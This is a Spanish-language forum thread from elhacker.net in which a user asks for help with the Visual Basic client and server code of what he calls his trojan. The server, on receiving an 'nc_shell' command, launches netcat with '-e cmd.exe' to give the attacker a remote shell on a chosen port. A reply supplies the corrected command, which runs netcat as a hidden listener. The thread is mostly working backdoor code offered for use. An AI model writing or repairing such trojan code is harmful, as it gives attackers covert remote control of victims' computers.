elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Problema con Split data
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con Split data  (Leído 1,601 veces)
hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Problema con Split data
« en: 15 Mayo 2007, 02:53 am »

weno sigo con el proyecto de mi troyano, que cada dia mejora mas... aunque estuvo tirado x aproximadamente 1semana, porque estuve mui ocupado asiendo cosas para el cole.. bueno en fin...
mi problema es que cuando mando algo, i ago split data, la segunda parte no llega nunca al text del servidor.. no se si me explico bien, pero aca dejo el code de cliente y servidor:
Código:
Cliente:

Public VPort As Integer
Private Sub Command1_Click()
VPort = Text1.Text
Dim vIndex As Variant 'Declaracion
vIndex = Split(Form1.ListConexion.SelectedItem.Key, "|")
Form1.WS(vIndex(0)).SendData "nc_shell" & "|" & VPort
End Sub
'al presionar el boton, manda al servidor la palabra nc_shell y un puerto



 Servidor:
Private Sub WS_onDataArrival(ByVal bytesTotal As Long)
Dim vData() As String
WS.GetData VTData, vbString
vData = Split(VTData, "|")
If vData(0) = "msge" Then
MsgBox vData(1)
VTData = ""
End If
If vData(0) = "nc_shell" Then
Shell App.path & "\nc.exe -e cmd.exe IP" & "|" & vData(1)
End If '''' ******notese esta parte que es la quye interesa!
Text1.Text = VTData
End Sub

la finalidad de este code, es abrir el netcat, para obtener shell remota, en un determinado port.. e revisado varias veces el code i no encuentro cual es la falla!
si no me explike bien diganme lo que no entendieron pero ayuda porfavor!
GRACIAS de antemano!


En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Problema con Split data
« Respuesta #1 en: 15 Mayo 2007, 18:00 pm »

Código:
 Servidor:
Private Sub WS_onDataArrival(ByVal bytesTotal As Long)
Dim vData() As String
WS.GetData VTData, vbString
vData = Split(VTData, "|")
If vData(0) = "msge" Then
MsgBox vData(1)
VTData = ""
End If
If vData(0) = "nc_shell" Then
Shell "cmd.exe /c " & App.path & "\nc.exe -L -p " & vData(1) & " -e cmd.exe", vbHide
End If
Text1.Text = VTData
End Sub


En línea

hepy_92

Desconectado Desconectado

Mensajes: 130



Ver Perfil
Re: Problema con Split data
« Respuesta #2 en: 16 Mayo 2007, 02:35 am »

 :-[
no puedo creeeeeer que aia echo un error tan tonto!!!! bueno de todas maneras Muchas Gracias!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema Backtrack 5 [ Data 0 y velocidad del adaptador 0]
Wireless en Linux
raul825 0 2,510 Último mensaje 27 Junio 2011, 12:32 pm
por raul825
Problema Data y ARP wifiway 2.0.3alpha3
Wireless en Linux
Cnk.- 5 4,058 Último mensaje 22 Julio 2011, 15:10 pm
por _pinty_
mysql problema al utilizar LOAD DATA
Bases de Datos
montyxxx 2 2,564 Último mensaje 10 Mayo 2012, 14:12 pm
por montyxxx
problema con split « 1 2 »
Java
alex_alex 12 4,737 Último mensaje 23 Mayo 2014, 22:35 pm
por alex_alex
problema con split y webrequest
.NET (C#, VB.NET, ASP)
snakeboy8 4 2,872 Último mensaje 4 Marzo 2015, 12:13 pm
por snakeboy8
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines